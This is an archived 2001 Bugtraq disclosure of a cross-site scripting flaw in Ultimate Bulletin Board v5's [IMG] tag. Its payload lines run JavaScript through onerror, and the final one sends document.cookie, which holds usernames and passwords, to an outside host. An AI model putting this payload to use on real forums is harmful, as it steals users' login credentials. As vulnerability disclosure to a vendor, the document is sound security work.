Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Ultimate Bulletin Board

From: Scott Ashman <sashman () JASPIN COM>
Date: Wed, 21 Feb 2001 14:19:16 -0800
Here is a message I just popped off to infopop about their Ultimate Bulletin Board v5 product.  It's not really meant 
for someone not used to their product.


--------------------------------------------------------------------------------


If a user has info stored in a cookie, replies to a message and is using IE 4.0+  there is a way for a hacker to trap 
his IP / user name / password / other cookie information and send them to an external source using your UBB code with 
HTML *off*.  There is a way to do this by simply viewing a message as well, although it's obvious something is going on 
as it involves a redirection.  Here's how it works :

Apparently the [img][/img] tag allows non-spaced javascript to run.  You can
write a line like this :

[IMG]test"onerror="alert('test');[/IMG]

This will run the javascript alert when the image 'test' fails to load.

Your cookies can hold both the username and password but is only accessable on
the
http://sitename/cgi-bin/ path.  Script running on anything in cgi-path
(replies) can access it.  So
[IMG]test"onerror="alert(document.cookie);[/IMG] will pop up an alert box
with the cookie info on a "reply" page as it's displayed in the thread review
at the bottom.

You can reassign the src of your image (this.src) with document.cookie tacked on
to point to an external page.  The weird thing about imgs and http requests
in general is that your destination does not have to be an image.  So <a
src="www.excite.com/index.html"> will actually try to access index.html.
Hence, you can add actual passable information to an external cgi or whatever.  On the external page all you need to do 
is either watch the logs or have the page itself
log any URL variables along with IPs coming in from the request.

The final line should read something like :
[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);
[/IMG]

(Pasting this line [no spaces/crlf] in an mesage means that any user replying to anything in that thread will cause 
their cookie to be sent to an external source)

Scott Ashman
Jaspin Interactive www.jaspin.com
Previous By Date Next
Previous By Thread Next

Current thread: